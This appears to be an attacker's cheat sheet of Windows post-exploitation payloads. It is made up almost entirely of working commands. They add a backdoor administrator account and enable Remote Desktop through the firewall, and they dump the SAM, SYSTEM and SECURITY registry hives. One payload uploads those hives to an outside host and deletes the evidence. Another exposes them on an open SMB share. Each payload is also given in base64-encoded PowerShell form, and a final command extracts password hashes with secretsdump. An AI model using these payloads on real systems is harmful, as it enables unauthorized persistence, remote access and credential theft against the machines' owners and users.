Payload/Loot

New admin hackerbeepboop Blabliblou_1

cat << 'EOF' | iconv -f UTF8 -t UTF16LE | base64 -w 0 | tee /tmp/payload.ps1
net user hackerbeepboop Blabliblou_1 /ADD
net localgroup Administrators hackerbeepboop /ADD
net localgroup "Remote Desktop Users" hackerbeepboop /ADD
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fAllowToGetHelp /t REG_DWORD /d 1 /f
netsh firewall add portopening TCP 3389 "Remote Desktop"
EOF

# bgBlAHQAIAB1AHMAZQByACAAaABhAGMAawBlAHIAYgBlAGUAcABiAG8AbwBwACAAQgBsAGEAYgBsAGkAYgBsAG8AdQBfADEAIAAvAEEARABEAAoAbgBlAHQAIABsAG8AYwBhAGwAZwByAG8AdQBwACAAQQBkAG0AaQBuAGkAcwB0AHIAYQB0AG8AcgBzACAAaABhAGMAawBlAHIAYgBlAGUAcABiAG8AbwBwACAALwBBAEQARAAKAG4AZQB0ACAAbABvAGMAYQBsAGcAcgBvAHUAcAAgACIAUgBlAG0AbwB0AGUAIABEAGUAcwBrAHQAbwBwACAAVQBzAGUAcgBzACIAIABoAGEAYwBrAGUAcgBiAGUAZQBwAGIAbwBvAHAAIAAvAEEARABEAAoAcgBlAGcAIABhAGQAZAAgACIASABLAEUAWQBfAEwATwBDAEEATABfAE0AQQBDAEgASQBOAEUAXABTAFkAUwBUAEUATQBcAEMAdQByAHIAZQBuAHQAQwBvAG4AdAByAG8AbABTAGUAdABcAEMAbwBuAHQAcgBvAGwAXABUAGUAcgBtAGkAbgBhAGwAIABTAGUAcgB2AGUAcgAiACAALwB2ACAAZgBEAGUAbgB5AFQAUwBDAG8AbgBuAGUAYwB0AGkAbwBuAHMAIAAvAHQAIABSAEUARwBfAEQAVwBPAFIARAAgAC8AZAAgADAAIAAvAGYAIAAKAHIAZQBnACAAYQBkAGQAIAAiAEgASwBFAFkAXwBMAE8AQwBBAEwAXwBNAEEAQwBIAEkATgBFAFwAUwBZAFMAVABFAE0AXABDAHUAcgByAGUAbgB0AEMAbwBuAHQAcgBvAGwAUwBlAHQAXABDAG8AbgB0AHIAbwBsAFwAVABlAHIAbQBpAG4AYQBsACAAUwBlAHIAdgBlAHIAIgAgAC8AdgAgAGYAQQBsAGwAbwB3AFQAbwBHAGUAdABIAGUAbABwACAALwB0ACAAUgBFAEcAXwBEAFcATwBSAEQAIAAvAGQAIAAxACAALwBmACAACgBuAGUAdABzAGgAIABmAGkAcgBlAHcAYQBsAGwAIABhAGQAZAAgAHAAbwByAHQAbwBwAGUAbgBpAG4AZwAgAFQAQwBQACAAMwAzADgAOQAgACIAUgBlAG0AbwB0AGUAIABEAGUAcwBrAHQAbwBwACIACgA=
Start-Process -NoNewWindow -FilePath "powershell.exe" -ArgumentList "-E", "BlAHQAIAB1AHMAZQByACAAaABhAGMAawBlAHIAYgBlAGUAcABiAG8AbwBwACAAQgBsAGEAYgBsAGkAYgBsAG8AdQBfADEAIAAvAEEARABEAAoAbgBlAHQAIABsAG8AYwBhAGwAZwByAG8AdQBwACAAQQBkAG0AaQBuAGkAcwB0AHIAYQB0AG8AcgBzACAAaABhAGMAawBlAHIAYgBlAGUAcABiAG8AbwBwACAALwBBAEQARAAKAG4AZQB0ACAAbABvAGMAYQBsAGcAcgBvAHUAcAAgACIAUgBlAG0AbwB0AGUAIABEAGUAcwBrAHQAbwBwACAAVQBzAGUAcgBzACIAIABoAGEAYwBrAGUAcgBiAGUAZQBwAGIAbwBvAHAAIAAvAEEARABEAAoAcgBlAGcAIABhAGQAZAAgACIASABLAEUAWQBfAEwATwBDAEEATABfAE0AQQBDAEgASQBOAEUAXABTAFkAUwBUAEUATQBcAEMAdQByAHIAZQBuAHQAQwBvAG4AdAByAG8AbABTAGUAdABcAEMAbwBuAHQAcgBvAGwAXABUAGUAcgBtAGkAbgBhAGwAIABTAGUAcgB2AGUAcgAiACAALwB2ACAAZgBEAGUAbgB5AFQAUwBDAG8AbgBuAGUAYwB0AGkAbwBuAHMAIAAvAHQAIABSAEUARwBfAEQAVwBPAFIARAAgAC8AZAAgADAAIAAvAGYAIAAKAHIAZQBnACAAYQBkAGQAIAAiAEgASwBFAFkAXwBMAE8AQwBBAEwAXwBNAEEAQwBIAEkATgBFAFwAUwBZAFMAVABFAE0AXABDAHUAcgByAGUAbgB0AEMAbwBuAHQAcgBvAGwAUwBlAHQAXABDAG8AbgB0AHIAbwBsAFwAVABlAHIAbQBpAG4AYQBsACAAUwBlAHIAdgBlAHIAIgAgAC8AdgAgAGYAQQBsAGwAbwB3AFQAbwBHAGUAdABIAGUAbABwACAALwB0ACAAUgBFAEcAXwBEAFcATwBSAEQAIAAvAGQAIAAxACAALwBmACAACgBuAGUAdABzAGgAIABmAGkAcgBlAHcAYQBsAGwAIABhAGQAZAAgAHAAbwByAHQAbwBwAGUAbgBpAG4AZwAgAFQAQwBQACAAMwAzADgAOQAgACIAUgBlAG0AbwB0AGUAIABEAGUAcwBrAHQAbwBwACIACgA="

dump SAM SYSTEM SECURITY

cat << 'EOF' | iconv -f UTF8 -t UTF16LE | base64 -w 0 | tee /tmp/payload.ps1
$d="$env:TEMP\";%{"sam";"system";"security"}|%{reg save hklm\$_ $d$_}
EOF

# JABkAGkAcgA9ACIAJABlAG4AdgA6AFQARQBNAFAAXAAiADsAJQB7ACIAcwBhAG0AIgA7ACIAcwB5AHMAdABlAG0AIgA7ACIAcwBlAGMAdQByAGkAdAB5ACIAfQB8ACUAewByAGUAZwAgAHMAYQB2AGUAIABoAGsAbABtAFwAJABfACAAJABkAGkAcgAkAF8AfQAKAA==

dump SAM SYSTEM SECURITY, upload, delete

cat << 'EOF' | iconv -f UTF8 -t UTF16LE | base64 -w 0 | tee /tmp/payload.ps1
$u="http://192.168.1.163:8080";$d="$env:TEMP\";%{"sam";"system";"security"}|%{reg save hklm\$_ $d$_;(New-Object System.Net.WebClient).UploadFile("$u","$d$_");clc "$d$_";rm "$d$_"}
EOF

# JAB1AD0AIgBoAHQAdABwADoALwAvADEAOQAyAC4AMQA2ADgALgAxAC4AMQA2ADMAOgA4ADAAOAAwACIAOwAkAGQAPQAiACQAZQBuAHYAOgBUAEUATQBQAFwAIgA7ACUAewAiAHMAYQBtACIAOwAiAHMAeQBzAHQAZQBtACIAOwAiAHMAZQBjAHUAcgBpAHQAeQAiAH0AfAAlAHsAcgBlAGcAIABzAGEAdgBlACAAaABrAGwAbQBcACQAXwAgACQAZAAkAF8AOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAFUAcABsAG8AYQBkAEYAaQBsAGUAKAAiACQAdQAiACwAIgAkAGQAJABfACIAKQA7AGMAbABjACAAIgAkAGQAJABfACIAOwByAG0AIAAiACQAZAAkAF8AIgB9AAoA

# cd $(mktemp -d) && git clone https://gitlab.com/charles.gargasson/PostDL . && sudo python3 postdl.py --ip 0.0.0.0 -p 8080 &

Start-Process -NoNewWindow -FilePath "powershell.exe" -ArgumentList "-E", "JAB1AD0AIgBoAHQAdABwADoALwAvADEAOQAyAC4AMQA2ADgALgAxAC4AMQA2ADMAOgA4ADAAOAAwACIAOwAkAGQAPQAiACQAZQBuAHYAOgBUAEUATQBQAFwAIgA7ACUAewAiAHMAYQBtACIAOwAiAHMAeQBzAHQAZQBtACIAOwAiAHMAZQBjAHUAcgBpAHQAeQAiAH0AfAAlAHsAcgBlAGcAIABzAGEAdgBlACAAaABrAGwAbQBcACQAXwAgACQAZAAkAF8AOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAFUAcABsAG8AYQBkAEYAaQBsAGUAKAAiACQAdQAiACwAIgAkAGQAJABfACIAKQA7AGMAbABjACAAIgAkAGQAJABfACIAOwByAG0AIAAiACQAZAAkAF8AIgB9AAoA"

dump SAM SYSTEM SECURITY, share them with a temporary SMB share (.. you need an user if passwordless access is disable, but you can change this setting)

mkdir "$env:TEMP\S";New-SmbShare -Name S -Path "$env:TEMP\S" -Temporary -FullAccess ([System.Security.Principal.SecurityIdentifier]::new('S-1-1-0')).Translate([System.Security.Principal.NTAccount]).Value
$d="$env:TEMP\S\";%{"sam";"system";"security"}|%{reg save hklm\$_ $d$_}

# Get-SmbShare
# Remove-SmbShare -Name S -Force

Read sam system security

secretsdump.py -sam /tmp/share/sam -system /tmp/share/system -security /tmp/share/security local -history